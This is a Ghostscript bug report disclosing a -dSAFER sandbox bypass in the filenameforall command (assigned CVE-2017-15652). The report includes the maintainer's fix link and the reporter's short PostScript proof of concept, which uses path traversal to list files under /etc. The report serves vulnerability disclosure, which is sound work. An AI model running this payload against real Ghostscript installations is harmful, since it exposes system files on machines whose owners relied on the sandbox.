698676 – Bypass -dSAFER in filenameforall command

Bug 698676 - Bypass -dSAFER in filenameforall command

Summary: Bypass -dSAFER in filenameforall command

Status:	RESOLVED FIXED

Alias:	None

Product:	Ghostscript
Classification:	Unclassified
Component:	Security (public) (show other bugs)
Version:	unspecified
Hardware:	PC Linux

Importance:	P4 normal
Assignee:	Chris Liddell (chrisl)

URL:
Keywords:

Depends on:
Blocks:

Reported:	2017-10-19 13:11 UTC by Jasper Yu
Modified:	2019-05-08 13:44 UTC (History)
CC List:	0 users

See Also:
Customer:
Word Size:	---

Attachments
the script run with ghostscript 9.22 (191.32 KB, image/png) 2017-10-19 13:11 UTC, Jasper Yu	Details
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Jasper Yu 2017-10-19 13:11:59 UTC

Created attachment 14403 [details]
the script run with ghostscript 9.22

CVE-2013-5653 fixed the filenameforall can ignore -dSAFER and list the files.
But still, there are some way to bypass it.

%!PS
(/usr/share/fonts/../../../../../../../../etc/*) {print (\n) print} 1024 string filenameforall
quit

Is this possible to request a CVE ID?

Comment 1 Jasper Yu 2017-10-19 20:43:05 UTC

I just requested a CVE number from MITRE, and the following was assigned.

Please use this CVE as reference in patching or info dissemination related to this particular issue.

CVE-2017-15652

Thanks

Comment 2 Chris Liddell (chrisl) 2017-10-20 08:09:25 UTC

Fixed in:
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=2fc463d0e


Thanks for the report!